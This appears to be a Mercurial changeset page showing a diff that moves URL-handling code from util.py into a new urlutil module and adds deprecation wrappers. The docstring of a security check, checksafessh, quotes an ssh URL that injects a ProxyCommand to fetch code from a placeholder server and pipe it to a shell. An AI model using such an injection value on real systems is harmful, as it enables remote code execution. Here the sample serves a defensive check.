comparison mercurial/util.py @ 46907:ffd3e823a7e5

urlutil: extract `url` related code from `util` into the new module. The new module is a good fit for this code, and gathering it there will make it easier for the pieces to work together later. Differential Revision: https://phab.mercurial-scm.org/D10374
author Pierre-Yves David <pierre-yves.david@octobus.net>
date Mon, 12 Apr 2021 03:01:04 +0200
parents 856820b497fc
children 9c3e84569071
comparison
equal deleted inserted replaced
46906:33524c46a092 46907:ffd3e823a7e5
26 import mmap 26 import mmap
27 import os 27 import os
28 import platform as pyplatform 28 import platform as pyplatform
29 import re as remod 29 import re as remod
30 import shutil 30 import shutil
31 import socket
32 import stat 31 import stat
33 import sys 32 import sys
34 import time 33 import time
35 import traceback 34 import traceback
36 import warnings 35 import warnings
55 from .utils import ( 54 from .utils import (
56 compression, 55 compression,
57 hashutil, 56 hashutil,
58 procutil, 57 procutil,
59 stringutil, 58 stringutil,
59 urlutil,
60 ) 60 )
61 61
62 if pycompat.TYPE_CHECKING: 62 if pycompat.TYPE_CHECKING:
63 from typing import ( 63 from typing import (
64 Iterator, 64 Iterator,
65 List, 65 List,
66 Optional, 66 Optional,
67 Tuple, 67 Tuple,
68 Union,
69 ) 68 )
70 69
71 70
72 base85 = policy.importmod('base85') 71 base85 = policy.importmod('base85')
73 osutil = policy.importmod('osutil') 72 osutil = policy.importmod('osutil')
2957 mapping[prefix_char] = prefix_char 2956 mapping[prefix_char] = prefix_char
2958 r = remod.compile(br'%s(%s)' % (prefix, patterns)) 2957 r = remod.compile(br'%s(%s)' % (prefix, patterns))
2959 return r.sub(lambda x: fn(mapping[x.group()[1:]]), s) 2958 return r.sub(lambda x: fn(mapping[x.group()[1:]]), s)
2960 2959
2961 2960
2962 def getport(port): 2961 def getport(*args, **kwargs):
2963 # type: (Union[bytes, int]) -> int 2962 msg = b'getport(...) moved to mercurial.utils.urlutil'
2964 """Return the port for a given network service. 2963 nouideprecwarn(msg, b'6.0', stacklevel=2)
2965 2964 return urlutil.getport(*args, **kwargs)
2966 If port is an integer, it's returned as is. If it's a string, it's 2965
2967 looked up using socket.getservbyname(). If there's no matching 2966
2968 service, error.Abort is raised. 2967 def url(*args, **kwargs):
2969 """ 2968 msg = b'url(...) moved to mercurial.utils.urlutil'
2970 try: 2969 nouideprecwarn(msg, b'6.0', stacklevel=2)
2971 return int(port) 2970 return urlutil.url(*args, **kwargs)
2972 except ValueError: 2971
2973 pass 2972
2974 2973 def hasscheme(*args, **kwargs):
2975 try: 2974 msg = b'hasscheme(...) moved to mercurial.utils.urlutil'
2976 return socket.getservbyname(pycompat.sysstr(port)) 2975 nouideprecwarn(msg, b'6.0', stacklevel=2)
2977 except socket.error: 2976 return urlutil.hasscheme(*args, **kwargs)
2978 raise error.Abort( 2977
2979 _(b"no port number associated with service '%s'") % port 2978
2980 ) 2979 def hasdriveletter(*args, **kwargs):
2981 2980 msg = b'hasdriveletter(...) moved to mercurial.utils.urlutil'
2982 2981 nouideprecwarn(msg, b'6.0', stacklevel=2)
2983 class url(object): 2982 return urlutil.hasdriveletter(*args, **kwargs)
2984 r"""Reliable URL parser. 2983
2985 2984
2986 This parses URLs and provides attributes for the following 2985 def urllocalpath(*args, **kwargs):
2987 components: 2986 msg = b'urllocalpath(...) moved to mercurial.utils.urlutil'
2988 2987 nouideprecwarn(msg, b'6.0', stacklevel=2)
2989 <scheme>://<user>:<passwd>@<host>:<port>/<path>?<query>#<fragment> 2988 return urlutil.urllocalpath(*args, **kwargs)
2990 2989
2991 Missing components are set to None. The only exception is 2990
2992 fragment, which is set to '' if present but empty. 2991 def checksafessh(*args, **kwargs):
2993 2992 msg = b'checksafessh(...) moved to mercurial.utils.urlutil'
2994 If parsefragment is False, fragment is included in query. If 2993 nouideprecwarn(msg, b'6.0', stacklevel=2)
2995 parsequery is False, query is included in path. If both are 2994 return urlutil.checksafessh(*args, **kwargs)
2996 False, both fragment and query are included in path. 2995
2997 2996
2998 See http://www.ietf.org/rfc/rfc2396.txt for more information. 2997 def hidepassword(*args, **kwargs):
2999 2998 msg = b'hidepassword(...) moved to mercurial.utils.urlutil'
3000 Note that for backward compatibility reasons, bundle URLs do not 2999 nouideprecwarn(msg, b'6.0', stacklevel=2)
3001 take host names. That means 'bundle://../' has a path of '../'. 3000 return urlutil.hidepassword(*args, **kwargs)
3002 3001
3003 Examples: 3002
3004 3003 def removeauth(*args, **kwargs):
3005 >>> url(b'http://www.ietf.org/rfc/rfc2396.txt') 3004 msg = b'removeauth(...) moved to mercurial.utils.urlutil'
3006 <url scheme: 'http', host: 'www.ietf.org', path: 'rfc/rfc2396.txt'> 3005 nouideprecwarn(msg, b'6.0', stacklevel=2)
3007 >>> url(b'ssh://[::1]:2200//home/joe/repo') 3006 return urlutil.removeauth(*args, **kwargs)
3008 <url scheme: 'ssh', host: '[::1]', port: '2200', path: '/home/joe/repo'>
3009 >>> url(b'file:///home/joe/repo')
3010 <url scheme: 'file', path: '/home/joe/repo'>
3011 >>> url(b'file:///c:/temp/foo/')
3012 <url scheme: 'file', path: 'c:/temp/foo/'>
3013 >>> url(b'bundle:foo')
3014 <url scheme: 'bundle', path: 'foo'>
3015 >>> url(b'bundle://../foo')
3016 <url scheme: 'bundle', path: '../foo'>
3017 >>> url(br'c:\foo\bar')
3018 <url path: 'c:\\foo\\bar'>
3019 >>> url(br'\\blah\blah\blah')
3020 <url path: '\\\\blah\\blah\\blah'>
3021 >>> url(br'\\blah\blah\blah#baz')
3022 <url path: '\\\\blah\\blah\\blah', fragment: 'baz'>
3023 >>> url(br'file:///C:\users\me')
3024 <url scheme: 'file', path: 'C:\\users\\me'>
3025
3026 Authentication credentials:
3027
3028 >>> url(b'ssh://joe:xyz@x/repo')
3029 <url scheme: 'ssh', user: 'joe', passwd: 'xyz', host: 'x', path: 'repo'>
3030 >>> url(b'ssh://joe@x/repo')
3031 <url scheme: 'ssh', user: 'joe', host: 'x', path: 'repo'>
3032
3033 Query strings and fragments:
3034
3035 >>> url(b'http://host/a?b#c')
3036 <url scheme: 'http', host: 'host', path: 'a', query: 'b', fragment: 'c'>
3037 >>> url(b'http://host/a?b#c', parsequery=False, parsefragment=False)
3038 <url scheme: 'http', host: 'host', path: 'a?b#c'>
3039
3040 Empty path:
3041
3042 >>> url(b'')
3043 <url path: ''>
3044 >>> url(b'#a')
3045 <url path: '', fragment: 'a'>
3046 >>> url(b'http://host/')
3047 <url scheme: 'http', host: 'host', path: ''>
3048 >>> url(b'http://host/#a')
3049 <url scheme: 'http', host: 'host', path: '', fragment: 'a'>
3050
3051 Only scheme:
3052
3053 >>> url(b'http:')
3054 <url scheme: 'http'>
3055 """
3056
3057 _safechars = b"!~*'()+"
3058 _safepchars = b"/!~*'()+:\\"
3059 _matchscheme = remod.compile(b'^[a-zA-Z0-9+.\\-]+:').match
3060
3061 def __init__(self, path, parsequery=True, parsefragment=True):
3062 # type: (bytes, bool, bool) -> None
3063 # We slowly chomp away at path until we have only the path left
3064 self.scheme = self.user = self.passwd = self.host = None
3065 self.port = self.path = self.query = self.fragment = None
3066 self._localpath = True
3067 self._hostport = b''
3068 self._origpath = path
3069
3070 if parsefragment and b'#' in path:
3071 path, self.fragment = path.split(b'#', 1)
3072
3073 # special case for Windows drive letters and UNC paths
3074 if hasdriveletter(path) or path.startswith(b'\\\\'):
3075 self.path = path
3076 return
3077
3078 # For compatibility reasons, we can't handle bundle paths as
3079 # normal URLS
3080 if path.startswith(b'bundle:'):
3081 self.scheme = b'bundle'
3082 path = path[7:]
3083 if path.startswith(b'//'):
3084 path = path[2:]
3085 self.path = path
3086 return
3087
3088 if self._matchscheme(path):
3089 parts = path.split(b':', 1)
3090 if parts[0]:
3091 self.scheme, path = parts
3092 self._localpath = False
3093
3094 if not path:
3095 path = None
3096 if self._localpath:
3097 self.path = b''
3098 return
3099 else:
3100 if self._localpath:
3101 self.path = path
3102 return
3103
3104 if parsequery and b'?' in path:
3105 path, self.query = path.split(b'?', 1)
3106 if not path:
3107 path = None
3108 if not self.query:
3109 self.query = None
3110
3111 # // is required to specify a host/authority
3112 if path and path.startswith(b'//'):
3113 parts = path[2:].split(b'/', 1)
3114 if len(parts) > 1:
3115 self.host, path = parts
3116 else:
3117 self.host = parts[0]
3118 path = None
3119 if not self.host:
3120 self.host = None
3121 # path of file:///d is /d
3122 # path of file:///d:/ is d:/, not /d:/
3123 if path and not hasdriveletter(path):
3124 path = b'/' + path
3125
3126 if self.host and b'@' in self.host:
3127 self.user, self.host = self.host.rsplit(b'@', 1)
3128 if b':' in self.user:
3129 self.user, self.passwd = self.user.split(b':', 1)
3130 if not self.host:
3131 self.host = None
3132
3133 # Don't split on colons in IPv6 addresses without ports
3134 if (
3135 self.host
3136 and b':' in self.host
3137 and not (
3138 self.host.startswith(b'[') and self.host.endswith(b']')
3139 )
3140 ):
3141 self._hostport = self.host
3142 self.host, self.port = self.host.rsplit(b':', 1)
3143 if not self.host:
3144 self.host = None
3145
3146 if (
3147 self.host
3148 and self.scheme == b'file'
3149 and self.host not in (b'localhost', b'127.0.0.1', b'[::1]')
3150 ):
3151 raise error.Abort(
3152 _(b'file:// URLs can only refer to localhost')
3153 )
3154
3155 self.path = path
3156
3157 # leave the query string escaped
3158 for a in (b'user', b'passwd', b'host', b'port', b'path', b'fragment'):
3159 v = getattr(self, a)
3160 if v is not None:
3161 setattr(self, a, urlreq.unquote(v))
3162
3163 def copy(self):
3164 u = url(b'temporary useless value')
3165 u.path = self.path
3166 u.scheme = self.scheme
3167 u.user = self.user
3168 u.passwd = self.passwd
3169 u.host = self.host
3170 u.path = self.path
3171 u.query = self.query
3172 u.fragment = self.fragment
3173 u._localpath = self._localpath
3174 u._hostport = self._hostport
3175 u._origpath = self._origpath
3176 return u
3177
3178 @encoding.strmethod
3179 def __repr__(self):
3180 attrs = []
3181 for a in (
3182 b'scheme',
3183 b'user',
3184 b'passwd',
3185 b'host',
3186 b'port',
3187 b'path',
3188 b'query',
3189 b'fragment',
3190 ):
3191 v = getattr(self, a)
3192 if v is not None:
3193 attrs.append(b'%s: %r' % (a, pycompat.bytestr(v)))
3194 return b'<url %s>' % b', '.join(attrs)
3195
3196 def __bytes__(self):
3197 r"""Join the URL's components back into a URL string.
3198
3199 Examples:
3200
3201 >>> bytes(url(b'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'))
3202 'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'
3203 >>> bytes(url(b'http://user:pw@host:80/?foo=bar&baz=42'))
3204 'http://user:pw@host:80/?foo=bar&baz=42'
3205 >>> bytes(url(b'http://user:pw@host:80/?foo=bar%3dbaz'))
3206 'http://user:pw@host:80/?foo=bar%3dbaz'
3207 >>> bytes(url(b'ssh://user:pw@[::1]:2200//home/joe#'))
3208 'ssh://user:pw@[::1]:2200//home/joe#'
3209 >>> bytes(url(b'http://localhost:80//'))
3210 'http://localhost:80//'
3211 >>> bytes(url(b'http://localhost:80/'))
3212 'http://localhost:80/'
3213 >>> bytes(url(b'http://localhost:80'))
3214 'http://localhost:80/'
3215 >>> bytes(url(b'bundle:foo'))
3216 'bundle:foo'
3217 >>> bytes(url(b'bundle://../foo'))
3218 'bundle:../foo'
3219 >>> bytes(url(b'path'))
3220 'path'
3221 >>> bytes(url(b'file:///tmp/foo/bar'))
3222 'file:///tmp/foo/bar'
3223 >>> bytes(url(b'file:///c:/tmp/foo/bar'))
3224 'file:///c:/tmp/foo/bar'
3225 >>> print(url(br'bundle:foo\bar'))
3226 bundle:foo\bar
3227 >>> print(url(br'file:///D:\data\hg'))
3228 file:///D:\data\hg
3229 """
3230 if self._localpath:
3231 s = self.path
3232 if self.scheme == b'bundle':
3233 s = b'bundle:' + s
3234 if self.fragment:
3235 s += b'#' + self.fragment
3236 return s
3237
3238 s = self.scheme + b':'
3239 if self.user or self.passwd or self.host:
3240 s += b'//'
3241 elif self.scheme and (
3242 not self.path
3243 or self.path.startswith(b'/')
3244 or hasdriveletter(self.path)
3245 ):
3246 s += b'//'
3247 if hasdriveletter(self.path):
3248 s += b'/'
3249 if self.user:
3250 s += urlreq.quote(self.user, safe=self._safechars)
3251 if self.passwd:
3252 s += b':' + urlreq.quote(self.passwd, safe=self._safechars)
3253 if self.user or self.passwd:
3254 s += b'@'
3255 if self.host:
3256 if not (self.host.startswith(b'[') and self.host.endswith(b']')):
3257 s += urlreq.quote(self.host)
3258 else:
3259 s += self.host
3260 if self.port:
3261 s += b':' + urlreq.quote(self.port)
3262 if self.host:
3263 s += b'/'
3264 if self.path:
3265 # TODO: similar to the query string, we should not unescape the
3266 # path when we store it, the path might contain '%2f' = '/',
3267 # which we should *not* escape.
3268 s += urlreq.quote(self.path, safe=self._safepchars)
3269 if self.query:
3270 # we store the query in escaped form.
3271 s += b'?' + self.query
3272 if self.fragment is not None:
3273 s += b'#' + urlreq.quote(self.fragment, safe=self._safepchars)
3274 return s
3275
3276 __str__ = encoding.strmethod(__bytes__)
3277
3278 def authinfo(self):
3279 user, passwd = self.user, self.passwd
3280 try:
3281 self.user, self.passwd = None, None
3282 s = bytes(self)
3283 finally:
3284 self.user, self.passwd = user, passwd
3285 if not self.user:
3286 return (s, None)
3287 # authinfo[1] is passed to urllib2 password manager, and its
3288 # URIs must not contain credentials. The host is passed in the
3289 # URIs list because Python < 2.4.3 uses only that to search for
3290 # a password.
3291 return (s, (None, (s, self.host), self.user, self.passwd or b''))
3292
3293 def isabs(self):
3294 if self.scheme and self.scheme != b'file':
3295 return True # remote URL
3296 if hasdriveletter(self.path):
3297 return True # absolute for our purposes - can't be joined()
3298 if self.path.startswith(br'\\'):
3299 return True # Windows UNC path
3300 if self.path.startswith(b'/'):
3301 return True # POSIX-style
3302 return False
3303
3304 def localpath(self):
3305 # type: () -> bytes
3306 if self.scheme == b'file' or self.scheme == b'bundle':
3307 path = self.path or b'/'
3308 # For Windows, we need to promote hosts containing drive
3309 # letters to paths with drive letters.
3310 if hasdriveletter(self._hostport):
3311 path = self._hostport + b'/' + self.path
3312 elif (
3313 self.host is not None and self.path and not hasdriveletter(path)
3314 ):
3315 path = b'/' + path
3316 return path
3317 return self._origpath
3318
3319 def islocal(self):
3320 '''whether localpath will return something that posixfile can open'''
3321 return (
3322 not self.scheme
3323 or self.scheme == b'file'
3324 or self.scheme == b'bundle'
3325 )
3326
3327
3328 def hasscheme(path):
3329 # type: (bytes) -> bool
3330 return bool(url(path).scheme) # cast to help pytype
3331
3332
3333 def hasdriveletter(path):
3334 # type: (bytes) -> bool
3335 return bool(path) and path[1:2] == b':' and path[0:1].isalpha()
3336
3337
3338 def urllocalpath(path):
3339 # type: (bytes) -> bytes
3340 return url(path, parsequery=False, parsefragment=False).localpath()
3341
3342
3343 def checksafessh(path):
3344 # type: (bytes) -> None
3345 """check if a path / url is a potentially unsafe ssh exploit (SEC)
3346
3347 This is a sanity check for ssh urls. ssh will parse the first item as
3348 an option; e.g. ssh://-oProxyCommand=curl${IFS}bad.server|sh/path.
3349 Let's prevent these potentially exploited urls entirely and warn the
3350 user.
3351
3352 Raises an error.Abort when the url is unsafe.
3353 """
3354 path = urlreq.unquote(path)
3355 if path.startswith(b'ssh://-') or path.startswith(b'svn+ssh://-'):
3356 raise error.Abort(
3357 _(b'potentially unsafe url: %r') % (pycompat.bytestr(path),)
3358 )
3359
3360
3361 def hidepassword(u):
3362 # type: (bytes) -> bytes
3363 '''hide user credential in a url string'''
3364 u = url(u)
3365 if u.passwd:
3366 u.passwd = b'***'
3367 return bytes(u)
3368
3369
3370 def removeauth(u):
3371 # type: (bytes) -> bytes
3372 '''remove all authentication information from a url string'''
3373 u = url(u)
3374 u.user = u.passwd = None
3375 return bytes(u)
3376 3007
3377 3008
3378 timecount = unitcountfn( 3009 timecount = unitcountfn(
3379 (1, 1e3, _(b'%.0f s')), 3010 (1, 1e3, _(b'%.0f s')),
3380 (100, 1, _(b'%.1f s')), 3011 (100, 1, _(b'%.1f s')),